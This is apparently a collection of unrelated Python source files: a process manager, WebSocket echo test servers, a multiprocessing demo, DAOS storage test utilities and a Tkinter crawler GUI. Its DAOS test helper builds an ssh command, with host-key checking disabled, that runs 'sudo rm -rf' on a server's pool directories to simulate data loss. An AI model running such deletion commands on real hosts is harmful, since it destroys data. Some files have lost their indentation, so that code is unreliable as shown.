            # Reap any processes that exited since the last pass.
            for proc in self.processes:
                if not proc.dead and proc.poll() is not None:
                    self._log.info('process [%s] with pid [%s] terminated',
                                   proc.name, proc.pid)
                    proc.dead = True
                    # Set the returncode of the ProcessManager instance if not
                    # already set.
                    if self.returncode is None:
                        self.returncode = proc.returncode
                    # One process exiting brings the whole group down.
                    self.terminate()
            if not self._process_count() > 0:
                break
        # Drain whatever output is still buffered in the queue.
        while True:
            try:
                proc, line = self.queue.get(timeout=0.1)
            except Empty:
                break
            else:
                self._print_line(proc, line)
        return self.returncode

    def terminate(self):
        """
        Terminate all the child processes of this ProcessManager, bringing the
        loop() to an end. SIGTERM is sent immediately; anything still alive
        five seconds later is SIGKILLed via a SIGALRM handler.
        """
        if self._terminating:
            return False
        self._terminating = True
        self._log.info("sending SIGTERM to all processes")
        for proc in self.processes:
            if proc.poll() is None:
                self._log.info("sending SIGTERM to pid [%d]", proc.pid)
                proc.terminate()

        def kill(signum, frame):
            # If anything is still alive, SIGKILL it
            for proc in self.processes:
                if proc.poll() is None:
                    self._log.info("sending SIGKILL to pid [%d]", proc.pid)
                    proc.kill()

        signal.signal(signal.SIGALRM, kill)  # @UndefinedVariable
        signal.alarm(5)  # @UndefinedVariable

    def _process_count(self):
        # Number of managed processes that are still running.
        return [p.poll() for p in self.processes].count(None)

    def _init_readers(self):
        # One daemon thread per process feeds its stdout into self.queue.
        for proc in self.processes:
            self._log.debug("Starting [%s]", proc.name)
            t = Thread(target=_enqueue_output, args=(proc, self.queue))
            t.daemon = True  # thread dies with the program
            t.start()

    def _init_printers(self):
        # Pad every name to the widest non-quiet name so columns line up.
        width = max(len(p.name) for p in
                    filter(lambda x: not x.quiet, self.processes))
        for proc in self.processes:
            proc.printer = Printer(sys.stdout,
                                   name=proc.name,
                                   width=width)

    def _print_line(self, proc, line):
        # Readers queue UnicodeDecodeError instances for undecodable chunks.
        if isinstance(line, UnicodeDecodeError):
            self._log.error(
                "UnicodeDecodeError while decoding line from process [%s]",
                proc.name)
        else:
            print(line, end='', file=proc.printer)
class Printer(object):
    """File-like wrapper that prefixes each output line with a timestamp
    and a fixed-width process name, e.g. ``12:34:56 worker  | ...``."""

    def __init__(self, output=sys.stdout, name='unknown', width=0):
        self.output = output
        self.name = name
        self.width = width           # pad width for the name column
        self._write_prefix = True    # NOTE(review): set but never consulted

    def write(self, *args, **kwargs):
        new_args = []
        for arg in args:
            lines = arg.split('\n')
            # Prefix only non-empty segments so a trailing newline does not
            # produce a dangling prefix.
            lines = [self._prefix() + l if l else l for l in lines]
            # NOTE(review): encoding to UTF-8 bytes assumes a Python 2 byte
            # stream (this module imports from Queue); under Python 3
            # sys.stdout.write() would reject bytes -- confirm.
            new_args.append('\n'.join(lines).encode('utf-8'))
        self.output.write(*new_args, **kwargs)

    def _prefix(self):
        # Timestamp + name padded to the shared column width.
        time = datetime.now().strftime('%H:%M:%S')
        name = self.name.ljust(self.width)
        prefix = '{time} {name} | '.format(time=time, name=name)
        return prefix
|
autobahn_test_servers.py | # -*- coding: utf-8 -*-
import logging
def run_cherrypy_server(host="127.0.0.1", port=9000):
    """Run a CherryPy-based WebSocket echo server (blocks until shutdown).

    Args:
        host (str): interface to bind. Defaults to 127.0.0.1.
        port (int): TCP port to listen on. Defaults to 9000.
    """
    # Imported lazily so the module loads even when CherryPy is absent.
    import cherrypy
    from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
    from ws4py.websocket import EchoWebSocket
    cherrypy.config.update({'server.socket_host': host,
                            'server.socket_port': port,
                            'engine.autoreload_on': False,
                            'log.screen': False})
    WebSocketPlugin(cherrypy.engine).subscribe()
    cherrypy.tools.websocket = WebSocketTool()

    class Root(object):
        @cherrypy.expose
        def index(self):
            # Handshake is handled by the websocket tool; nothing to serve.
            pass

    config = {
        '/': {
            'tools.websocket.on': True,
            'tools.websocket.handler_cls': EchoWebSocket
        }
    }
    logger = logging.getLogger('autobahn_testsuite')
    logger.warning("Serving CherryPy server on %s:%s" % (host, port))
    cherrypy.quickstart(Root(), '/', config)
def run_gevent_server(host="127.0.0.1", port=9001):
    """Run a gevent-based WebSocket echo server (blocks forever).

    Args:
        host (str): interface to bind. Defaults to 127.0.0.1.
        port (int): TCP port to listen on. Defaults to 9001.
    """
    # Monkey-patch before anything else touches the stdlib sockets.
    from gevent import monkey; monkey.patch_all()
    from ws4py.server.geventserver import WebSocketServer
    from ws4py.websocket import EchoWebSocket
    server = WebSocketServer((host, port), websocket_class=EchoWebSocket)
    logger = logging.getLogger('autobahn_testsuite')
    logger.warning("Serving gevent server on %s:%s" % (host, port))
    server.serve_forever()
def run_tornado_server(host="127.0.0.1", port=9002):
    """Run a Tornado-based WebSocket echo server (blocks in the IOLoop).

    Args:
        host (str): interface to bind. Defaults to 127.0.0.1.
        port (int): TCP port to listen on. Defaults to 9002.
    """
    from tornado import ioloop, web, websocket

    class EchoWebSocket(websocket.WebSocketHandler):
        def on_message(self, message):
            # Echo every frame straight back to the client.
            self.write_message(message)

    app = web.Application([(r"/", EchoWebSocket)])
    app.listen(port, address=host)
    logger = logging.getLogger('autobahn_testsuite')
    logger.warning("Serving Tornado server on %s:%s" % (host, port))
    ioloop.IOLoop.instance().start()
def run_autobahn_server(host="127.0.0.1", port=9003):
    """Run an Autobahn/Twisted WebSocket echo server (blocks in reactor).

    Args:
        host (str): interface to bind. Defaults to 127.0.0.1.
        port (int): TCP port to listen on. Defaults to 9003.
    """
    # choosereactor import has the side effect of installing a reactor.
    from autobahntestsuite import choosereactor
    import autobahn
    from autobahn.websocket import listenWS
    from twisted.internet import reactor
    from autobahn.websocket import WebSocketServerFactory, \
        WebSocketServerProtocol

    class ServerProtocol(WebSocketServerProtocol):
        def onMessage(self, msg, binary):
            # Echo the payload back, preserving the binary flag.
            self.sendMessage(msg, binary)

    class ServerFactory(WebSocketServerFactory):
        protocol = ServerProtocol

    factory = ServerFactory("ws://%s:%d" % (host, port))
    factory.setProtocolOptions(failByDrop=False)
    # Bug fix: `logger` was only bound inside the __main__ block, so calling
    # this function from an importing module raised NameError. Bind it
    # locally, as the other run_* helpers do.
    logger = logging.getLogger('autobahn_testsuite')
    logger.warning("Serving Autobahn server on %s:%s" % (host, port))
    listenWS(factory, None)
    reactor.run()
if __name__ == '__main__':
    import argparse
    from multiprocessing import Process

    logging.basicConfig(format='%(asctime)s %(message)s')
    logger = logging.getLogger('autobahn_testsuite')
    logger.setLevel(logging.WARNING)

    # One flag per backend, plus --run-all as shorthand for everything.
    parser = argparse.ArgumentParser()
    parser.add_argument('--run-all', dest='run_all', action='store_true',
                        help='Run all servers backend')
    parser.add_argument('--run-cherrypy-server', dest='run_cherrypy', action='store_true',
                        help='Run the CherryPy server backend')
    parser.add_argument('--run-gevent-server', dest='run_gevent', action='store_true',
                        help='Run the gevent server backend')
    parser.add_argument('--run-tornado-server', dest='run_tornado', action='store_true',
                        help='Run the Tornado server backend')
    parser.add_argument('--run-autobahn-server', dest='run_autobahn', action='store_true',
                        help='Run the Autobahn server backend')
    args = parser.parse_args()

    if args.run_all:
        args.run_cherrypy = True
        args.run_gevent = True
        args.run_tornado = True
        args.run_autobahn = True

    # Each requested backend runs in its own daemon child process.
    procs = []
    logger.warning("CherryPy server: %s" % args.run_cherrypy)
    if args.run_cherrypy:
        p0 = Process(target=run_cherrypy_server)
        p0.daemon = True
        procs.append(p0)
    logger.warning("Gevent server: %s" % args.run_gevent)
    if args.run_gevent:
        p1 = Process(target=run_gevent_server)
        p1.daemon = True
        procs.append(p1)
    logger.warning("Tornado server: %s" % args.run_tornado)
    if args.run_tornado:
        p2 = Process(target=run_tornado_server)
        p2.daemon = True
        procs.append(p2)
    logger.warning("Autobahn server: %s" % args.run_autobahn)
    if args.run_autobahn:
        p3 = Process(target=run_autobahn_server)
        p3.daemon = True
        procs.append(p3)

    for p in procs:
        p.start()
        # Bug fix: this was logging.info() on the root logger, which is
        # filtered at the default WARNING level, so the message never
        # appeared; use the module logger at warning level like the rest.
        logger.warning("Starting process... %d" % p.pid)
    for p in procs:
        p.join()
|
multiprocessing_import_main.py | #
"""Creating and waiting for a process
"""
# end_pymotw_header
import multiprocessing
import multiprocessing_import_worker
if __name__ == "__main__":
jobs = []
for i in range(5):
p = multiprocessing.Process(target=multiprocessing_import_worker.worker)
jobs.append(p)
p.start()
|
osa_utils.py | #!/usr/bin/python3
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import ctypes
import queue
import time
import threading
import re
from avocado import fail_on
from ior_test_base import IorTestBase
from mdtest_test_base import MdtestBase
from command_utils import CommandFailure
from pydaos.raw import (DaosContainer, IORequest,
DaosObj, DaosApiError)
from general_utils import create_string_buffer, run_command
class OSAUtils(MdtestBase, IorTestBase):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server offline drain test cases.
:avocado: recursive
"""
    def setUp(self):
        """Set up for test case: fetch yaml parameters and reset OSA state."""
        super().setUp()
        # Maps a pool to [contA, contA-status, contB, contB-status];
        # see prepare_cont_ior_write_read for how the slots are used.
        self.pool_cont_dict = {}
        self.container = None
        self.obj = None
        self.ioreq = None
        self.dmg_command = self.get_dmg_command()
        self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*',
                                           default=[0])[0]
        self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*',
                                           default=[0])[0]
        self.record_length = self.params.get("length", '/run/record/*',
                                             default=[0])[0]
        self.ior_w_flags = self.params.get("write_flags", '/run/ior/iorflags/*',
                                           default="")
        self.ior_r_flags = self.params.get("read_flags", '/run/ior/iorflags/*')
        self.server_count = len(self.hostlist_servers)
        self.engine_count = self.server_managers[0].get_config_value(
            "engines_per_host")
        # Shared queue used by IOR/mdtest worker threads to report failures.
        self.out_queue = queue.Queue()
        # Don't raise on non-zero dmg exit status; tests inspect results.
        self.dmg_command.exit_status_exception = False
        # Feature toggles; individual tests flip these as needed.
        self.test_during_aggregation = False
        self.test_during_rebuild = False
        self.test_with_checksum = True
        # By default, test_with_rf is set to False.
        # It is up to individual test to enable it.
        self.test_with_rf = False
        self.test_with_blank_node = False
        self.test_with_snapshot = False
@fail_on(CommandFailure)
def get_pool_leader(self):
"""Get the pool leader.
Returns:
int: pool leader value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["leader"])
@fail_on(CommandFailure)
def get_rebuild_status(self):
"""Get the rebuild status.
Returns:
str: rebuild status
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["status"]
@fail_on(CommandFailure)
def get_rebuild_state(self):
"""Get the rebuild state.
Returns:
str: rebuild state
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["state"]
    @fail_on(CommandFailure)
    def is_rebuild_done(self, time_interval,
                        wait_for_rebuild_to_complete=False):
        """Wait on the pool's rebuild progress.

        Args:
            time_interval: wait interval (seconds) between rebuild checks.
            wait_for_rebuild_to_complete (bool): passed through to
                TestPool.wait_for_rebuild; presumably True waits for rebuild
                completion and False for rebuild to start -- confirm against
                the TestPool implementation. Defaults to False.
        """
        self.pool.wait_for_rebuild(wait_for_rebuild_to_complete,
                                   interval=time_interval)
@fail_on(CommandFailure)
def assert_on_rebuild_failure(self):
"""If the rebuild is not successful,
raise assert.
"""
rebuild_status = self.get_rebuild_status()
self.log.info("Rebuild Status: %s", rebuild_status)
rebuild_failed_string = ["failed", "scanning", "aborted", "busy"]
self.assertTrue(rebuild_status not in rebuild_failed_string,
"Rebuild failed")
    @fail_on(CommandFailure)
    def print_and_assert_on_rebuild_failure(self, out, timeout=3):
        """Print the out value (daos, dmg, etc) and check for rebuild
        completion. If not, raise assert.

        Args:
            out (object): command output to log before the rebuild check.
            timeout (int, optional): wait interval handed to
                is_rebuild_done. Defaults to 3.
        """
        self.log.info(out)
        self.is_rebuild_done(timeout)
        self.assert_on_rebuild_failure()
@fail_on(CommandFailure)
def get_pool_version(self):
"""Get the pool version.
Returns:
int: pool_version_value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["version"])
@fail_on(CommandFailure)
def get_ipaddr_for_rank(self, rank=None):
"""Obtain the IPAddress and port number for a
particular server rank.
Args:
rank (int): daos_engine rank. Defaults to None.
Returns:
ip_addr (str) : IPAddress for the rank.
port_num (str) : Port number for the rank.
"""
output = self.dmg_command.system_query()
members_length = self.server_count * self.engine_count
for i in range(0, members_length):
if rank == int(output["response"]["members"][i]["rank"]):
temp = output["response"]["members"][i]["addr"]
ip_addr = temp.split(":")
temp = output["response"]["members"][i]["fabric_uri"]
port_num = temp.split(":")
return ip_addr[0], port_num[2]
return None, None
    @fail_on(CommandFailure)
    def remove_pool_dir(self, ip_addr=None, port_num=None):
        """Remove the /mnt/daos[x]/<pool_uuid>/vos-* directory over ssh.

        Args:
            ip_addr (str): IP address of the daos server. Defaults to None.
            port_num (str): fabric port number of the daos engine; used to
                pick the mount index when two engines share a host.

        Fails the test when no address/port is given, the port matches no
        configured fabric port, or the engine count is unsupported.
        """
        # Create the expected port list
        # expected_ports = [port0] - Single engine/server
        # expected_ports = [port0, port1] - Two engine/server
        expected_ports = [engine_param.get_value("fabric_iface_port")
                          for engine_param in self.server_managers[-1].
                          manager.job.yaml.engine_params]
        self.log.info("Expected ports : %s", expected_ports)
        if ip_addr is None or port_num is None:
            self.log.info("ip_addr : %s port_number: %s", ip_addr, port_num)
            self.fail("No IP Address or Port number provided")
        else:
            if self.engine_count == 1:
                self.log.info("Single Engine per Server")
                cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
                    sudo rm -rf /mnt/daos/{}/vos-*". \
                    format(ip_addr, self.pool.uuid)
            elif self.engine_count == 2:
                # Map the engine's fabric port to mount index 0 or 1.
                if port_num == str(expected_ports[0]):
                    port_val = 0
                elif port_num == str(expected_ports[1]):
                    port_val = 1
                else:
                    self.log.info("port_number: %s", port_num)
                    self.fail("Invalid port number")
                cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
                    sudo rm -rf /mnt/daos{}/{}/vos-*". \
                    format(ip_addr, port_val, self.pool.uuid)
            else:
                self.fail("Not supported engine per server configuration")
            run_command(cmd)
    def set_container(self, container):
        """Set the OSA utils container object.

        Args:
            container (obj): container object to be used within OSA utils.
        """
        self.container = container
def simple_osa_reintegrate_loop(self, rank, action="exclude",
loop_time=100):
"""This method performs exclude or drain and
reintegration on a rank for a certain amount of time.
Args:
rank (int): daos server rank.
action (str) : "exclude" or "drain".
Defaults to "exclude"
loop_time: Total time to perform drain/reintegrate
operation in a loop. (Default : 100 secs)
"""
start_time = 0
finish_time = 0
start_time = time.time()
while int(finish_time - start_time) < loop_time:
if action == "exclude":
output = self.dmg_command.pool_exclude(self.pool.uuid,
rank)
else:
output = self.dmg_command.pool_drain(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
output = self.dmg_command.pool_reintegrate(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
finish_time = time.time()
    @fail_on(DaosApiError)
    def write_single_object(self):
        """Write a deterministic single-value dataset to a new container.

        Connects to the pool, creates and opens a container (checksums per
        the test yaml), then writes no_of_dkeys x no_of_akeys single values.
        """
        self.pool.connect(2)
        csum = self.params.get("enable_checksum", '/run/container/*')
        self.container = DaosContainer(self.context)
        input_param = self.container.cont_input_values
        input_param.enable_chksum = csum
        self.container.create(poh=self.pool.pool.handle,
                              con_prop=input_param)
        self.container.open()
        self.obj = DaosObj(self.context, self.container)
        self.obj.create(objcls=1)
        self.obj.open()
        self.ioreq = IORequest(self.context,
                               self.container,
                               self.obj, objtype=4)
        self.log.info("Writing the Single Dataset")
        for dkey in range(self.no_of_dkeys):
            for akey in range(self.no_of_akeys):
                # Payload: the akey index's first digit repeated
                # record_length times, so verify_single_object can
                # recompute it exactly.
                indata = ("{0}".format(str(akey)[0])
                          * self.record_length)
                d_key_value = "dkey {0}".format(dkey)
                c_dkey = create_string_buffer(d_key_value)
                a_key_value = "akey {0}".format(akey)
                c_akey = create_string_buffer(a_key_value)
                c_value = create_string_buffer(indata)
                c_size = ctypes.c_size_t(ctypes.sizeof(c_value))
                self.ioreq.single_insert(c_dkey, c_akey, c_value, c_size)
        self.obj.close()
        self.container.close()
    @fail_on(DaosApiError)
    def verify_single_object(self):
        """Verify the dataset written by write_single_object.

        Re-reads every dkey/akey single value and fails the test on the
        first mismatch against the expected repeated-digit payload.
        """
        self.pool.connect(2)
        self.container.open()
        self.obj.open()
        self.log.info("Single Dataset Verification -- Started")
        for dkey in range(self.no_of_dkeys):
            for akey in range(self.no_of_akeys):
                # Recompute the payload written for this akey.
                indata = ("{0}".format(str(akey)[0]) *
                          self.record_length)
                c_dkey = create_string_buffer("dkey {0}".format(dkey))
                c_akey = create_string_buffer("akey {0}".format(akey))
                val = self.ioreq.single_fetch(c_dkey,
                                              c_akey,
                                              len(indata)+1)
                if indata != (repr(val.value)[1:-1]):
                    self.d_log.error("ERROR:Data mismatch for "
                                     "dkey = {0}, "
                                     "akey = {1}".format(
                                         "dkey {0}".format(dkey),
                                         "akey {0}".format(akey)))
                    self.fail("ERROR: Data mismatch for dkey = {0}, akey={1}"
                              .format("dkey {0}".format(dkey),
                                      "akey {0}".format(akey)))
        self.obj.close()
        self.container.close()
    def prepare_cont_ior_write_read(self, oclass, flags):
        """Prepare the containers for IOR write and read invocations.

        To enable aggregation:
        - Create two containers and read always from first container
        Normal usage (use only a single container):
        - Create a single container and use the same.

        Args:
            oclass (str): IOR object class
            flags (str): IOR flags
        """
        self.log.info(self.pool_cont_dict)
        # If pool is not in the dictionary,
        # initialize its container list to None
        # {poolA : [None, None], [None, None]}
        if self.pool not in self.pool_cont_dict:
            self.pool_cont_dict[self.pool] = [None] * 4
        # Create container if the pool doesn't have one.
        # Otherwise, use the existing container in the pool.
        # pool_cont_dict {pool A: [containerA, Updated,
        #                          containerB, Updated],
        #                 pool B: [containerA, Updated,
        #                          containerB, None]}
        if self.pool_cont_dict[self.pool][0] is None:
            self.add_container(self.pool, create=False)
            self.set_cont_class_properties(oclass)
            if self.test_with_checksum is False:
                tmp = self.get_object_replica_value(oclass)
                rf_value = "rf:{}".format(tmp - 1)
                self.update_cont_properties(rf_value)
            self.container.create()
            self.pool_cont_dict[self.pool][0] = self.container
            self.pool_cont_dict[self.pool][1] = "Updated"
        else:
            # During aggregation testing, a write goes to a second
            # container so reads can keep targeting the first one.
            if ((self.test_during_aggregation is True) and
                    (self.pool_cont_dict[self.pool][1] == "Updated") and
                    (self.pool_cont_dict[self.pool][3] is None) and
                    ("-w" in flags)):
                # Write to the second container
                self.add_container(self.pool, create=False)
                self.set_cont_class_properties(oclass)
                if self.test_with_checksum is False:
                    tmp = self.get_object_replica_value(oclass)
                    rf_value = "rf:{}".format(tmp - 1)
                    self.update_cont_properties(rf_value)
                self.container.create()
                self.pool_cont_dict[self.pool][2] = self.container
                self.pool_cont_dict[self.pool][3] = "Updated"
            else:
                self.container = self.pool_cont_dict[self.pool][0]
    def delete_extra_container(self, pool):
        """Delete the extra container in the pool.

        Refer prepare_cont_ior_write_read. This method should be called
        when OSA tests intend to enable aggregation.

        Args:
            pool (object): pool handle
        """
        # NOTE(review): sets the reclaim property on self.pool rather than
        # the passed-in pool -- identical for current callers that pass
        # self.pool, but confirm the intent.
        self.pool.set_property("reclaim", "time")
        extra_container = self.pool_cont_dict[pool][2]
        extra_container.destroy()
        self.pool_cont_dict[pool][3] = None
def get_object_replica_value(self, oclass):
""" Get the object replica value for an object class.
Args:
oclass (str): Object Class (eg: RP_2G1,etc)
Returns:
value (int) : Object replica value
"""
value = 0
if "_" in oclass:
replica_list = oclass.split("_")
value = replica_list[1][0]
else:
self.log.info("Wrong Object Class. Cannot split")
return int(value)
    def update_cont_properties(self, cont_prop):
        """Update the existing container properties.

        Args:
            cont_prop (str): new container properties string; replaces the
                current properties value wholesale.
        """
        self.container.properties.value = cont_prop
    def set_cont_class_properties(self, oclass="S1"):
        """Update the container class to match the IOR object class.

        Fixes the rf factor based on the object replica value and removes
        the redundancy factor for S type object classes.

        Args:
            oclass (str, optional): Container object class to be set.
                Defaults to "S1".
        """
        self.container.oclass.value = oclass
        # Set the container properties properly for S!, S2 class.
        # rf should not be set to 1 for S type object class.
        x = re.search("^S\\d$", oclass)
        prop = self.container.properties.value
        if x is not None:
            prop = prop.replace("rf:1", "rf:0")
        else:
            # Non-S classes: derive rf from the replica count (replicas-1).
            tmp = self.get_object_replica_value(oclass)
            rf_value = "rf:{}".format(tmp - 1)
            prop = prop.replace("rf:1", rf_value)
        self.container.properties.value = prop
        # Over-write oclass settings if using redundancy factor
        # and self.test_with_rf is True.
        # This has to be done so that container created doesn't
        # use the object class.
        if self.test_with_rf is True and \
                "rf" in self.container.properties.value:
            self.log.info(
                "Detected container redundancy factor: %s",
                self.container.properties.value)
            self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
            self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
            self.container.oclass.update(None)
def assert_on_exception(self, out_queue=None):
"""Assert on exception while executing an application.
Args:
out_queue (queue): Check whether the queue is
empty. If empty, app (ior, mdtest) didn't encounter error.
"""
if out_queue is None:
out_queue = self.out_queue
if out_queue.empty():
pass
else:
exc = out_queue.get(block=False)
out_queue.put(exc)
raise CommandFailure(exc)
def cleanup_queue(self, out_queue=None):
"""Cleanup the existing thread queue.
Args:
out_queue (queue): Queue to cleanup.
"""
if out_queue is None:
out_queue = self.out_queue
while not out_queue.empty():
out_queue.get(block=True)
    def run_ior_thread(self, action, oclass, test, single_cont_read=True,
                       fail_on_warning=True, pool=None):
        """Start an IOR thread for writing or reading data and wait for it.

        Args:
            action (str): "Write" selects the write flags from the yaml;
                anything else selects the read flags.
            oclass (str): IOR object class
            test (list): IOR test sequence
            single_cont_read (bool): always read from the 1st container.
                Defaults to True.
            fail_on_warning (bool): test terminates for IOR warnings.
                Defaults to True.
            pool (TestPool): pool to run ior on. Defaults to None
                (self.pool).
        """
        # Intermediate (between correct and hack) implementation for allowing a
        # pool to be passed in. Needs to be fixed by making the pool argument
        # required.
        if pool is None:
            pool = self.pool
        self.cleanup_queue()
        if action == "Write":
            flags = self.ior_w_flags
        else:
            flags = self.ior_r_flags
        # Add a thread for these IOR arguments
        process = threading.Thread(target=self.ior_thread,
                                   kwargs={"pool": pool,
                                           "oclass": oclass,
                                           "test": test,
                                           "flags": flags,
                                           "single_cont_read":
                                           single_cont_read,
                                           "fail_on_warning":
                                           fail_on_warning})
        # Launch the IOR thread
        process.start()
        # Wait for the thread to finish
        process.join()
        # Surface any error the worker thread queued.
        if not self.out_queue.empty():
            self.assert_on_exception()
    def ior_thread(self, pool, oclass, test, flags,
                   single_cont_read=True,
                   fail_on_warning=True):
        """Run IOR against a container (worker body for run_ior_thread).

        Args:
            pool (object): pool handle
            oclass (str): IOR object class, container class.
            test (list): IOR test sequence; test[2] is used as the
                transfer size and test[3] as the block size.
            flags (str): IOR flags
            single_cont_read (bool): always read from the 1st container.
                Defaults to True.
            fail_on_warning (bool): test terminates for IOR warnings.
                Defaults to True.
        """
        self.cleanup_queue()
        self.pool = pool
        self.ior_cmd.get_params(self)
        self.ior_cmd.set_daos_params(self.server_group, self.pool)
        self.log.info("Redundancy Factor : %s", self.test_with_rf)
        self.ior_cmd.dfs_oclass.update(oclass)
        self.ior_cmd.dfs_dir_oclass.update(oclass)
        if single_cont_read is True:
            # Prepare the containers created and use in a specific
            # way defined in prepare_cont_ior_write_read.
            self.prepare_cont_ior_write_read(oclass, flags)
        elif single_cont_read is False and self.container is not None:
            # Here self.container is having actual value. Just use it.
            self.log.info(self.container)
        else:
            self.fail("Not supported option on ior_thread")
        try:
            job_manager = self.get_ior_job_manager_command()
        except CommandFailure as err_msg:
            # Queue the failure for the launching thread, then raise.
            self.out_queue.put(err_msg)
            self.assert_on_exception()
        job_manager.job.dfs_cont.update(self.container.uuid)
        self.ior_cmd.transfer_size.update(test[2])
        self.ior_cmd.block_size.update(test[3])
        self.ior_cmd.flags.update(flags)
        # Update oclass settings if using redundancy factor
        # and self.test_with_rf is True.
        if self.test_with_rf is True and \
                "rf" in self.container.properties.value:
            self.log.info(
                "Detected container redundancy factor: %s",
                self.container.properties.value)
            self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
            self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
        self.run_ior_with_pool(create_pool=False, create_cont=False,
                               fail_on_warning=fail_on_warning,
                               out_queue=self.out_queue)
        if not self.out_queue.empty():
            self.assert_on_exception()
    def run_mdtest_thread(self, oclass="RP_2G1"):
        """Start an mdtest thread and wait until the thread completes.

        Args:
            oclass (str): IOR object class, container class.
                Defaults to "RP_2G1".
        """
        # Create container only
        self.mdtest_cmd.dfs_destroy = False
        if self.container is None:
            self.add_container(self.pool, create=False)
            self.mdtest_cmd.dfs_oclass.update(oclass)
            self.set_cont_class_properties(self.mdtest_cmd.dfs_oclass)
            if self.test_with_checksum is False:
                tmp = self.get_object_replica_value(self.mdtest_cmd.dfs_oclass)
                rf_value = "rf:{}".format(tmp - 1)
                self.update_cont_properties(rf_value)
            self.container.create()
        job_manager = self.get_mdtest_job_manager_command(self.manager)
        job_manager.job.dfs_cont.update(self.container.uuid)
        # Add a thread for these IOR arguments
        process = threading.Thread(target=self.execute_mdtest)
        # Launch the MDtest thread
        process.start()
        # Wait for the thread to finish
        process.join()
        # Surface any error the worker thread queued.
        if not self.out_queue.empty():
            self.assert_on_exception()
|
gui.py | # -*- coding: utf-8 -*-
from Tkinter import *
import tkMessageBox
import threading
from PIL import ImageTk, Image # pillow 로 하면 설치하면 py2app에서 에러가 난다
import serial
import time
import os
import key_set
import main
class Interface:
    """Tkinter front-end for the image crawler.

    Lets the user pick a country and a target printer, enter a keyword and
    numeric crawl parameters, then runs the crawler (``main.Main``) on a
    background thread and reports progress in per-printer status labels.
    """

    def __init__(self, Master):
        self.country_sel = StringVar()
        self.print_sel = StringVar()  # fixed: original created this StringVar twice
        self.master = Master
        self.master.geometry('800x450')
        self.keySet = key_set.Key()
        self.print1 = "RICOH_SP_150"
        self.print2 = "RICOH_SP_150_2"
        self.count = 0  # searches run so far; the first one expands the window

        # Main frame
        self.mainFrame = Frame(self.master, background="gray17")
        self.mainFrame.pack(fill=X)
        # Title
        self.titleFrame = Frame(self.mainFrame, background="gray17")
        self.titleFrame.pack(side=TOP, fill=X)
        self.titleLabel = Label(self.titleFrame, background="gray17")
        self.titleLabel.configure(text='INTER[FACE]', foreground="white", font="SourceCodePro-Medium 50")
        self.titleLabel.pack(padx=40, pady=40)
        # Country selection (radio buttons)
        self.selectCountryFrame = Frame(self.mainFrame, background="gray17")
        self.selectCountryFrame.pack(side=TOP)
        self.selectCountryRadio1 = Radiobutton(self.selectCountryFrame, variable=self.country_sel, value="us", background="gray17")
        self.selectCountryRadio1.pack(side=LEFT)
        self.selectCountryRadio1Label = Label(self.selectCountryFrame, background="gray17")
        self.selectCountryRadio1Label.configure(text="USA", foreground="white")
        self.selectCountryRadio1Label.pack(side=LEFT, padx=10, pady=5)
        self.selectCountryRadio2 = Radiobutton(self.selectCountryFrame, variable=self.country_sel, value="de", background="gray17")
        self.selectCountryRadio2.pack(side=LEFT)
        self.selectCountryRadio2Label = Label(self.selectCountryFrame, background="gray17")
        self.selectCountryRadio2Label.configure(text="German", foreground="white")
        self.selectCountryRadio2Label.pack(side=LEFT, padx=10, pady=5)
        self.country_sel.set("us")
        # Printer selection (radio buttons)
        self.selectPrintFrame = Frame(self.mainFrame, background="gray17")
        self.selectPrintFrame.pack(side=TOP)
        self.selectPrintRadio1 = Radiobutton(self.selectPrintFrame, variable=self.print_sel, value=self.print1, background="gray17")
        self.selectPrintRadio1.pack(side=LEFT)
        self.selctPrintRadio1Label = Label(self.selectPrintFrame, background="gray17")
        self.selctPrintRadio1Label.configure(text="L ", foreground="white")
        self.selctPrintRadio1Label.pack(side=LEFT, padx=10, pady=5)
        self.selectPrintRadio2 = Radiobutton(self.selectPrintFrame, variable=self.print_sel, value=self.print2, background="gray17")
        self.selectPrintRadio2.pack(side=LEFT)
        self.selctPrintRadio2Label = Label(self.selectPrintFrame, background="gray17")
        self.selctPrintRadio2Label.configure(text="R ", foreground="white")
        self.selctPrintRadio2Label.pack(side=LEFT, padx=10, pady=5)
        self.print_sel.set(self.print1)
        # Keyword entry
        self.keyFrame = Frame(self.mainFrame, background="gray17")
        self.keyFrame.pack(side=TOP, fill=X)
        self.keyEntry = Entry(self.keyFrame, background="gray17")
        self.keyEntry.configure(width=25, foreground="white", insertbackground="white", font="SourceCodePro-Medium 20")
        self.keyEntry.pack(padx=20, pady=20)
        # Numeric parameters: image count, correlate count, depth, sleep time
        self.countFrame = Frame(self.mainFrame, background="gray17")
        self.countFrame.pack(side=TOP)
        self.img_cntEntry = Entry(self.countFrame, background="gray17")
        self.img_cntEntry.configure(width=5, foreground="white")
        self.img_cntEntry.pack(side=LEFT, padx=3, pady=10)
        self.corr_cntEntry = Entry(self.countFrame, background="gray17")
        self.corr_cntEntry.configure(width=5, foreground="white")
        self.corr_cntEntry.pack(side=LEFT, padx=3, pady=10)
        self.depthEntry = Entry(self.countFrame, background="gray17")
        self.depthEntry.configure(width=5, foreground="white")
        self.depthEntry.pack(side=LEFT, padx=3, pady=10)
        self.sleepEntry = Entry(self.countFrame, background="gray17")
        self.sleepEntry.configure(width=5, foreground="white")
        self.sleepEntry.pack(side=LEFT, padx=3, pady=10)
        # Find button
        self.buttonFrame = Frame(self.mainFrame, background="gray17")
        self.buttonFrame.pack(side=TOP, fill=X)
